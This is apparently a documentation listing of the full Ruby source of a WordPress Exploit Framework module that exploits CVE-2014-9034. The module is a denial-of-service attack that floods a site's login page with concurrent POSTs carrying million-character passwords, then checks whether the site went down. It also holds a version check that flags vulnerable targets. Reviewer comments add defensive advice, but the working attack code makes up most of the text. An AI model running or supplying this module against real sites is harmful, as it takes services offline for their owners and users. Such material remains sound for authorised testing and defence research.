class Wpxf::Auxiliary::LongPasswordDos
Public Class Methods
new()
Calls superclass method
Wpxf::Net::HttpClient::new
# File lib/wpxf/modules/auxiliary/dos/long_password_dos.rb, line 9
# Sets up the module: calls the superclass constructor, records the module
# metadata via update_info, then registers five options via register_options
# (both helpers are defined outside this listing).
#
# Reviewer context: the metadata ties this module to CVE-2014-9034, where a
# very long password is improperly handled during hashing. The defaults below
# (a 1_000_000-character password, 200 requests) show the scale of input an
# affected login path accepts. The defensive counterpart is to run a release
# at or above the fixed versions named in `desc`, and to bound password and
# request-body size before any hashing work is done.
def initialize
  super

  module_info = {
    name: 'Long Password DoS',
    desc: 'WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, '\
          'and 4.x before 4.0.1 allows remote attackers to cause a denial '\
          'of service via a long password that is improperly handled during '\
          'hashing.',
    author: [
      'Javier Nieto Arevalo',  # Vulnerability disclosure
      'Andres Rojas Guerrero', # Vulnerability disclosure
      'rastating'              # WPXF module
    ],
    references: [
      ['CVE', '2014-9034'],
      ['WPVDB', '7681'],
      ['URL', 'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034']
    ],
    date: 'Nov 20 2014'
  }
  # Splatted so the callee receives the same arguments as the inline form.
  update_info(**module_info)

  # Size of the password field sent in each login attempt.
  pass_length_option = IntegerOption.new(
    name: 'pass_length',
    required: true,
    desc: 'Length of the password to use',
    default: 1_000_000
  )

  # Upper bound on the number of login requests queued by #run.
  max_requests_option = IntegerOption.new(
    name: 'max_requests',
    required: true,
    desc: 'Max number of requests to send',
    default: 200
  )

  # Per-response wait, in seconds according to the option description.
  timeout_option = IntegerOption.new(
    name: 'http_client_timeout',
    desc: 'Max wait time in seconds for HTTP responses',
    default: 5,
    required: true
  )

  # Account name placed in the login form; empty by default.
  username_option = StringOption.new(
    name: 'username',
    desc: 'The username to attempt to login with',
    required: true,
    default: ''
  )

  # When true, #run checks that the user exists before sending anything.
  validate_user_option = BooleanOption.new(
    name: 'validate_user',
    desc: 'Validate the specified username',
    required: true,
    default: true
  )

  register_options([
    pass_length_option,
    max_requests_option,
    timeout_option,
    username_option,
    validate_user_option
  ])
end
Public Instance Methods
check()
# File lib/wpxf/modules/auxiliary/dos/long_password_dos.rb, line 81
# Classifies the target from its detected WordPress version alone.
#
# The affected windows are half-open: a version is affected when it is
# >= the lower bound and < the upper bound (the first fixed release).
#
# Returns :unknown when wordpress_version (defined outside this listing)
# yields nil, :vulnerable when the version falls inside an affected window,
# and :safe otherwise.
#
# NOTE(review): the verdict rests only on the reported version string. A site
# that hides or alters its version, or carries a backported fix, will not be
# classified accurately. Treat :safe/:vulnerable as a hint to confirm against
# the installed release.
def check
  detected = wordpress_version
  return :unknown if detected.nil?

  affected_windows = [
    %w[0 3.7.5],
    %w[3.8 3.8.5],
    %w[3.9 3.9.3],
    %w[4.0 4.0.1]
  ].map { |lower, upper| [Gem::Version.new(lower), Gem::Version.new(upper)] }

  in_window = affected_windows.any? do |lower, upper|
    detected >= lower && detected < upper
  end

  in_window ? :vulnerable : :safe
end
max_requests()
# File lib/wpxf/modules/auxiliary/dos/long_password_dos.rb, line 73
# Reads the 'max_requests' option through normalized_option_value (defined
# outside this listing) and returns whatever that helper yields.
def max_requests
  option_key = 'max_requests'
  normalized_option_value(option_key)
end
pass_length()
# File lib/wpxf/modules/auxiliary/dos/long_password_dos.rb, line 77
# Reads the 'pass_length' option through normalized_option_value (defined
# outside this listing) and returns whatever that helper yields.
def pass_length
  option_key = 'pass_length'
  normalized_option_value(option_key)
end
run()
Calls superclass method
Wpxf::Module#run
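# File lib/wpxf/modules/auxiliary/dos/long_password_dos.rb, line 101
# Executes the module: optionally confirms the user exists, queues
# max_requests login POSTs that all carry the same pass_length-character
# password, runs the queue, then reports whether the site still responds.
#
# Returns false when the superclass run fails, when the user check fails, or
# when the target still appears online afterwards; returns true when the
# target appears to be down.
#
# Defender's view: on the wire this is a burst of POSTs to the login URL, each
# with an unusually large password field. Request-body size limits and login
# rate limiting in front of the application are the controls that blunt it.
# Upgrading to a fixed release removes the underlying flaw.
def run
  return false unless super

  if should_validate_user?
    emit_info "Checking if user \"#{username}\" exists..."
    unless wordpress_user_exists?(username)
      emit_error 'The specified user does not exist, aborting operation.'
      # Explicit false (was a bare `return`, i.e. nil) so every failure path
      # hands callers the same value.
      return false
    end
  end

  emit_info 'Generating payload...'
  pass = Wpxf::Utility::Text.rand_alpha(pass_length)
  opts = {
    url: wordpress_url_login,
    method: :post,
    body: wordpress_login_post_body(username, pass)
  }

  # Read the option once; it is used for the loop and both status messages.
  request_count = max_requests
  emit_info "Preparing #{request_count} requests..."

  # NOTE(review): if queue_request invokes this callback from worker threads,
  # the counter is updated without synchronisation, so the progress figures
  # are best-effort. Confirm against queue_request's implementation.
  complete_requests = 0
  request_count.times do
    queue_request(opts) do |_res|
      complete_requests += 1
      emit_warning("#{complete_requests} requests executed") if (complete_requests % 10).zero?
    end
  end

  emit_info "Beginning execution of #{request_count} requests over #{max_http_concurrency} threads"
  execute_queued_requests
  emit_success 'Finished executing requests'

  if wordpress_and_online?
    emit_error "FAILED: #{full_uri} appears to still be online"
    return false
  end

  emit_success "#{full_uri} appears to be down"
  true
end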
should_validate_user?()
# File lib/wpxf/modules/auxiliary/dos/long_password_dos.rb, line 65
# Reads the 'validate_user' option through normalized_option_value (defined
# outside this listing) and returns whatever that helper yields. #run uses the
# result to decide whether to check that the user exists first.
def should_validate_user?
  option_key = 'validate_user'
  normalized_option_value(option_key)
end
username()
# File lib/wpxf/modules/auxiliary/dos/long_password_dos.rb, line 69
# Reads the 'username' option through normalized_option_value (defined
# outside this listing) and returns whatever that helper yields.
def username
  option_key = 'username'
  normalized_option_value(option_key)
end